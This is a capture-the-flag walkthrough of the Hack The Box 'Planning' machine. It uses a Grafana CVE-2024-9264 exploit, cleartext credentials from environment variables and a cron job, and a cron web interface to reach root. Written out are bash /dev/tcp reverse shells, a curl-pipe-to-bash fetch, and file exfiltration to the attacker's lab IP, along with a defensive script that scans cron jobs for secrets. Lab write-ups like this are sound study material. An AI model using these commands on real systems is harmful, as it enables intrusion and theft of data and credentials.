> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2025-05-17

Hack The Box — Planning (Linux)

Grafana CVE-2024-9264 exploitation for container foothold, credential recovery from Grafana and cron artifacts, and root compromise via exposed cron management interface.

Target

  • IP: 10.129.198.59

Machine information

As is common in real-life pentests, you start the Planning box with credentials for the following account:

  • admin / 0D5oT70Fq13EvB5r

Recon

sudo nmap -sC -sV 10.129.198.59 -p- -T5 -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add planning.htb to /etc/hosts.

Go to http://planning.htb/.

It is a PHP website.

gobuster vhost -u 'http://planning.htb/' -w '/home/kali/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt' -t 50 --append-domain
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]

Go to http://grafana.planning.htb/.

There is a login form.

Use credentials: admin / 0D5oT70Fq13EvB5r.

We can log in.

Click the question mark at top-right. Version shown:

Grafana v11.0.0 (83b9528bce)

There is a known vulnerability, CVE-2024-9264, with a public exploit:

  • https://github.com/nollium/CVE-2024-9264

CVE-2024-9264 affects the experimental SQL Expressions feature of Grafana 11: user-supplied DuckDB queries were insufficiently sanitised, which lets an authenticated user read local files and run commands.

git clone https://github.com/nollium/CVE-2024-9264.git
python3 CVE-2024-9264/CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /etc/passwd http://grafana.planning.htb

We obtain /etc/passwd.

We notice user grafana with home in /home/grafana.

We can get a reverse shell.

Create a file rev with content:

bash -i >& /dev/tcp/10.10.14.252/4444 0>&1

Serve the file over HTTP, start a listener, and have the exploit fetch and execute it:

python3 -m http.server 8000
nc -vlnp 4444
python3 CVE-2024-9264/CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'curl http://10.10.14.252:8000/rev | bash' http://grafana.planning.htb

We get a reverse shell as user root, but we are inside a Docker container.

Upgrade the reverse shell:

script -qc /bin/bash /dev/null
CTRL+Z
stty raw -echo
fg

In /var/lib/grafana/ there is file grafana.db.

To transfer it to our machine, start a listener on the attacker side:

nc -vlnp 5555 > grafana.db

Then send the file from the container:

cat grafana.db > /dev/tcp/10.10.14.252/5555

Back on the attacker machine, open the database and list the users:

sqlite3 grafana.db
select * from user;
1|0|admin|admin@localhost||58e91b780977c1c34eb2274b75cb8577b215f2634a441fbb555d396edb3285a6c6b3a1f1ebca06e74ab6aa1a6a8edeb729d5|3H8kUvMcCR|cprH3V8GFe||1|1|0||2025-02-28 19:19:54|2025-04-03 12:31:49|0|2025-05-11 15:00:56|0|0|

The only user is admin, whose password we already know.

env

Among the environment variables we notice:

GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo

Try these credentials over SSH:

ssh enzo@planning.htb

Enter password RioTecRANDEntANT!.

We get a shell as user enzo.

cat /opt/crontabs/crontab.db

One of the stored jobs runs this command:

/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz

So a backup of the Grafana container image is created, and the resulting zip archive is protected with the password P4ssw0rdS0pRi0T3c, stored in clear text in the cron definition.
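Secrets embedded in cron command lines are exactly the kind of finding a periodic audit should raise. The following is an added example, not code from the writeup, that scans cron definitions for inline credentials and reports them redacted; it assumes crontab.db holds one JSON record per line with a "command" field (a layout the writeup does not confirm), and it also accepts plain crontab lines.

```python
import json
import re

# Each pattern captures the credential as group "secret" so reports can redact it.
SECRET_PATTERNS = [
    ("zip -P password", re.compile(r"\bzip\b[^|&;]*?\s-P\s+(?P<secret>\S+)")),
    ("--password= flag", re.compile(r"--password=(?P<secret>\S+)")),
    ("mysql -p password", re.compile(r"\bmysql\w*\b[^|&;]*?\s-p(?P<secret>\S+)")),
]
# Plain crontab entry: five schedule fields or an @alias, then the command.
CRON_LINE = re.compile(r"^(?:@\w+|(?:\S+\s+){5})(?P<command>.+)$")

def extract_commands(text):
    """Yield (label, command) from JSON-lines records (assumed layout) or crontab text."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("{"):
            try:
                doc = json.loads(line)
            except ValueError:
                continue
            if isinstance(doc, dict) and doc.get("command"):
                yield doc.get("name", doc.get("_id", "?")), doc["command"]
            continue
        m = CRON_LINE.match(line)
        if m:
            yield "crontab", m.group("command").strip()

def redact(secret):
    # Keep two characters so a finding can be matched without printing the secret.
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"

def find_embedded_secrets(text):
    """Return (label, kind, redacted_secret) for every inline credential found."""
    return [(label, kind, redact(m.group("secret")))
            for label, command in extract_commands(text)
            for kind, pat in SECRET_PATTERNS
            for m in pat.finditer(command)]

# Constructed sample: the writeup's backup command as a record (field names assumed) plus a crontab line.
SAMPLE = "\n".join([
    json.dumps({"name": "grafana-backup", "command":
        "/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && "
        "/usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c "
        "/var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz"}),
    "*/10 * * * * mysqldump -u backup -pHunter2 app > /tmp/app.sql",
])
SAMPLE_FINDINGS = find_embedded_secrets(SAMPLE)
```

Pointing the scanner at /opt/crontabs/crontab.db and the system crontabs turns this into a simple recurring check; a hit means the job should be rewritten to read its secret from a root-only file or a secret store.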

Trying that password for root does not work:

su root

ss -ltpn
State        Recv-Q       Send-Q             Local Address:Port                Peer Address:Port       Process
LISTEN       0            511                    127.0.0.1:8000                     0.0.0.0:*
LISTEN       0            511                      0.0.0.0:80                       0.0.0.0:*
LISTEN       0            4096                   127.0.0.1:3000                     0.0.0.0:*
LISTEN       0            4096               127.0.0.53%lo:53                       0.0.0.0:*
LISTEN       0            70                     127.0.0.1:33060                    0.0.0.0:*
LISTEN       0            4096                  127.0.0.54:53                       0.0.0.0:*
LISTEN       0            4096                   127.0.0.1:46315                    0.0.0.0:*
LISTEN       0            151                    127.0.0.1:3306                     0.0.0.0:*
LISTEN       0            4096                           *:22                             *:*

Port 8000 is bound to 127.0.0.1 only, so forward it over SSH:

ssh enzo@planning.htb -NL 8000:localhost:8000

Go to http://localhost:8000.

Credentials are requested.

Log in with:

root / P4ssw0rdS0pRi0T3c

Start netcat listener:

nc -vlnp 4444

On the site, create a new cronjob.

Set command:

bash -c 'bash -i >& /dev/tcp/10.10.14.252/4444 0>&1'

Save.

Click run now.

We get a reverse shell as user root.